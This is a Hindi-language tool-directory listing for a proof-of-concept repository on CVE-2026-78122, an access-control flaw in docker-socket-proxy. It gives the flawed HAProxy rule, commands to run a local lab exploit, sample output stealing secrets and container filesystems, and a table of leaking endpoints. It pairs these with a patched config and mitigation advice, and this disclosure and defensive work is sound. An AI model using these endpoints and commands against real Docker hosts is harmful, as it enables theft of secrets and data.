Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-78122-POC — CVE-2026-78122 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो docker-socket-proxy के मोटे (coarse) एक्सेस नियमों के माध्यम से कंटेनर फाइलसिस्टम और पर्यावरण चर (environment variable) के बहिर्क्षरण (exfiltration) को प्रदर्शित करता है, साथ ही एक पैच किया हुआ HAProxy कॉन्फ़िगरेशन भी शामिल है। | Kitploit
उपकरण/GitHubGitHub/legendile7/cve-2026-78122-poc
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणकॉन्फ़िगरेशन ऑडिटिंगडेटा निष्कासनलैब और अभ्यास
GitHublegendile7/cve-2026-78122-poc

CVE-2026-78122-POC

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2026-78122 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो docker-socket-proxy के मोटे (coarse) एक्सेस नियमों के माध्यम से कंटेनर फाइलसिस्टम और पर्यावरण चर (environment variable) के बहिर्क्षरण (exfiltration) को प्रदर्शित करता है, साथ ही एक पैच किया हुआ HAProxy कॉन्फ़िगरेशन भी शामिल है।

11 दिन पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2026-78122 — प्रूफ ऑफ कॉन्सेप्ट

Tecnativa docker-socket-proxy ≤ 0.5.0 — अपर्याप्त एक्सेस-नियंत्रण ग्रैन्युलैरिटी (CWE-1220) CVSS 4.0: 8.3 (उच्च) — CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

हमला वेक्टर एडजेसेंट (आसन्न) है (AV:A): हमलावर को प्रॉक्सी तक लोकल/आसन्न नेटवर्क पहुँच की आवश्यकता होती है — यही कारण है कि इसे किसी भी रूटेबल इंटरफ़ेस से दूर रखना शमन (mitigation) का हिस्सा है।

docker-socket-proxy डॉकर सॉकेट के लिए एक HAProxy फ्रंट-एंड है, जिसका पूरा उद्देश्य Docker API तक स्कोप्ड, न्यूनतम-विशेषाधिकार (scoped, least-privilege) पहुँच प्रदान करना है। ऑपरेटरों द्वारा उपयोग की जाने वाली मानक "सुरक्षित, रीड-ओनली" विधि यह है:

root@kitploit:~
CONTAINERS=1     # allow listing/inspecting containers
POST=0           # deny everything that mutates state
# every other flag left at its default (0)

ऑपरेटर उचित रूप से मानते हैं कि इससे रीड-ओनली कंटेनर मेटाडेटा प्राप्त होता है। ऐसा नहीं है।

मूल कारण

haproxy.cfg में, पूरा /containers नेमस्पेस एक ही मोटे (coarse) प्रीफिक्स नियम द्वारा नियंत्रित होता है:

root@kitploit:~
http-request allow if { path,url_dec -m reg -i ^(/v[\d\.]+)?/containers } { env(CONTAINERS) -m bool }

वह regex /containers के अंतर्गत हर GET सब-पाथ से मेल खाता है, जिसमें वे संवेदनशील रीड एंडपॉइंट भी शामिल हैं, जो कभी भी "कंटेनर सूची" (list containers) का हिस्सा नहीं थे। चूँकि ये सभी GET हैं, इसलिए POST=0 गार्ड इन्हें रोकने के लिए कुछ नहीं करता:

कुल प्रभाव: "हार्डन्ड" CONTAINERS=1, POST=0 स्थिति के साथ, जो कोई भी प्रॉक्सी तक पहुँच सकता है, वह सीक्रेट्स डंप कर सकता है और होस्ट पर मौजूद हर कंटेनर का पूरा फ़ाइलसिस्टम एक्सफ़िल्ट्रेट कर सकता है।

लेआउट

root@kitploit:~
lab/        vulnerable docker-socket-proxy v0.5.0 + a victim container with planted secrets
exploit/    exploit.sh — end-to-end data-exfiltration PoC
mitigation/ patched haproxy.cfg + compose that denies the sensitive sub-paths
verify.sh   one command: stand up both, exploit, print a before/after table
teardown.sh stop everything
loot/        exploit output lands here

इसे चलाएँ

इसके लिए Docker + Docker Compose और एक POSIX शेल आवश्यक है (Windows पर Git Bash काम करता है)।

root@kitploit:~
./verify.sh

या चरण-दर-चरण:

root@kitploit:~
docker compose -f lab/docker-compose.yml up -d      # vulnerable proxy on 127.0.0.1:2375
bash exploit/exploit.sh http://127.0.0.1:2375        # loot lands in ./loot

प्रॉक्सी केवल 127.0.0.1 से बाउंड है। डॉकर सॉकेट प्रॉक्सी को कभी भी किसी रूटेबल इंटरफ़ेस पर एक्सपोज़ न करें।

देखा गया परिणाम (v0.5.0)

root@kitploit:~
[+] POST /containers/create -> 403 Forbidden   (operator believes they are safe)
    Leaked environment variables:
      STRIPE_API_KEY=sk_live_FAKE_0000000000000000
      DB_PASSWORD=hunter2-from-container-env
[+] Pulled /etc/passwd via /archive
[+] Stole /run/secrets/aws.env via /archive
[+] Exported entire filesystem (8,095,232 bytes) via /export
[+] Retrieved process table via /top and logs via /logs

उपरोक्त प्रत्येक आइटम POST=0 अभी भी प्रभावी रहते हुए प्राप्त किया गया।

शमन

असली समाधान: पैच किए गए रिलीज़ में अपग्रेड करें (issue #182 / PR #183 में ट्रैक किया गया) और केवल CONTAINERS=1 को "रीड-ओनली" मानने पर निर्भर रहना बंद करें।

इस रिपो में एक ड्रॉप-इन हार्डन्ड कॉन्फ़िग (mitigation/haproxy.patched.cfg) भी शामिल है, जो मोटे /containers अनुमति से पहले खतरनाक सब-पाथों के लिए स्पष्ट deny नियम जोड़ता है, जिनमें से प्रत्येक को एक समर्पित फ़्लैग से पुनः सक्षम किया जा सकता है (ALLOW_ARCHIVE, ALLOW_EXPORT, ALLOW_LOGS, ALLOW_TOP):

root@kitploit:~
http-request deny if { ... /containers/[..]/archive } ! { env(ALLOW_ARCHIVE) -m bool }
http-request deny if { ... /containers/[..]/export }  ! { env(ALLOW_EXPORT)  -m bool }
http-request deny if { ... /containers/[..]/logs }    ! { env(ALLOW_LOGS)    -m bool }
http-request deny if { ... /containers/[..]/top }     ! { env(ALLOW_TOP)     -m bool }

पहले/बाद का सत्यापन (verify.sh आउटपुट) — समान CONTAINERS=1, POST=0 स्थिति:

वैध list/inspect अभी भी काम करते हैं; एक्सफ़िल्ट्रेशन प्रिमिटिव्स अवरुद्ध कर दिए गए हैं।

परिचालन के दृष्टिकोण से भी: प्रॉक्सी को किसी भी रूटेबल नेटवर्क से दूर रखें, डॉकर सॉकेट को रीड-ओनली माउंट करें, और न्यूनतम विशेषाधिकार (least privilege) लागू करें (केवल उन्हीं फ़्लैग्स को सक्षम करें जिनकी किसी उपभोक्ता को आवश्यकता है)।

संदर्भ

  • CVE-2026-78122 (NVD) — https://nvd.nist.gov/vuln/detail/CVE-2026-78122
  • CVE-2026-78122 (cvefeed) — https://cvefeed.io/vuln/detail/CVE-2026-78122
  • VulnCheck एडवाइज़री — https://www.vulncheck.com/advisories/docker-socket-proxy-through-insufficient-access-control-granularity-exposes-container-filesystems
  • मूल राइटअप (nedlir) — https://gist.github.com/nedlir/e4f52f88a757f02c67db1fd5dd70d732
  • अपस्ट्रीम रिपॉजिटरी — https://github.com/Tecnativa/docker-socket-proxy
  • असुरक्षित कॉन्फ़िग — https://github.com/Tecnativa/docker-socket-proxy/blob/v0.5.0/haproxy.cfg#L49-L61
  • Issue #182 / PR #183

केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। लैब पूरी तरह से आपके अपने होस्ट पर, आपके द्वारा बनाए गए कंटेनरों के विरुद्ध चलती है।

टूल डाउनलोड करें
एंडपॉइंट (GET)यह क्या लीक करता है
/containers/{id}/archive?path=…किसी भी कंटेनर से मनमानी फ़ाइल रीड
/containers/{id}/exportपूरा कंटेनर फ़ाइलसिस्टम tar के रूप में
/containers/{id}/logsकंटेनर stdout/stderr
/containers/{id}/topपूर्ण argv सहित प्रोसेस सूची (क्रेडेंशियल्स हो सकते हैं)
/containers/{id}/jsonपूर्ण कॉन्फ़िग, जिसमें पर्यावरण चर (environment variables) शामिल हैं
GET एंडपॉइंटअसुरक्षित (:2375)शमित (:2376)
/containers/json (सूची)200200
/containers/{id}/json (निरीक्षण)200200
/containers/{id}/archive200403
/containers/{id}/export200403
/containers/{id}/logs200403
/containers/{id}/top200403